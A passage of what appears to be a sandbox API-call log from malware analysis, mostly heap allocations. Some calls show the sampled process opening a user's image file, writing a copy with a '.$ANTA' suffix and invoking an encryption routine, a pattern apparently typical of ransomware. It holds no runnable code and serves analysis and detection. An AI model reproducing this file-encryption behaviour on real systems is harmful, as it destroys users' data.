Size=0x10) returned 0x43cab50 [0091.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0091.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0091.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0091.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0091.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0091.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0091.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0091.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0091.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0091.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0091.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0091.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0091.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0091.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0091.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0091.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0091.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea0b8 [0091.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0091.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0091.239] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0091.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0091.239] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0091.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0091.239] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0091.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0091.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0091.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0091.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0091.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0091.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0091.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0091.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0091.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0091.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0091.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0091.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0091.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0091.239] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\YwIpia.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\ywipia.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0091.240] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.240] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0091.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0091.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0091.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0091.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0091.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0091.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0091.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0091.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0091.240] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0091.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0091.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0091.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0091.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0091.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0091.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0091.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0091.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0091.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0091.241] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0091.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0091.241] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0091.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0091.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0091.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0091.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0091.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0091.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0091.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0091.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0091.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0091.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0091.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0091.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0091.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0091.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0091.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0091.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0091.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0091.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0091.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0091.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0091.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0091.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0091.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0091.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0091.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0091.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0091.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0091.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0091.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0091.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0091.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0091.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0091.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0091.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0091.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0091.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0091.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0091.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0091.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0091.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0091.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0091.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0091.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0091.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0091.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0091.243] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0091.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0091.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0091.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0091.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0091.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0091.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0091.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0091.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0091.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0091.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0091.243] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\YwIpia.gif.$ANTA" (normalized: "c:\\users\\fd1hvy\\pictures\\ywipia.gif.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0091.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0091.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0091.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0091.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0091.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0091.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0091.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0091.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0091.244] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0091.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0091.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0091.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0091.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0091.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0091.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0091.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0091.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0091.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0091.245] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0091.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0091.245] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0091.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0091.245] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0091.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0091.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0091.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0091.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0091.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0091.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0091.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0091.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0091.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0091.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0091.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0091.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0091.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0091.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0091.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0091.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0b020 [0091.249] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0091.249] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0xfa89, lpOverlapped=0x0) returned 1 [0091.251] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0091.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0091.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0091.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0091.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0091.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xfa89) returned 0x4516010 [0091.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0b020 | out: hHeap=0x1780000) returned 1 [0091.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0091.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0091.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0091.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0091.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0091.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xfa89) returned 0x4525aa8 [0091.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0091.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0091.256] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0091.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0091.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0091.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0091.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0091.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0091.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xfa89) returned 0x4516010 [0091.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0091.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0091.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0091.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0091.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0091.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0091.256] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0091.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0091.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0091.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0091.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0091.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0091.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0091.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0091.257] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0091.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0091.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0091.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0091.257] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0091.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0091.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0091.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0091.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2520 [0091.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0091.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0091.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0091.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0091.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xfa89) returned 0x4516010 [0091.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0091.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2330 [0091.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0091.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0091.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0091.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2380 [0091.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0091.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0091.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0091.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23a0 [0091.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0091.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0091.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0091.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca340 [0091.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0091.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0091.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0091.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0091.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0091.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xfa89) returned 0x4535540 [0091.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0091.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0091.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0091.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0091.258] 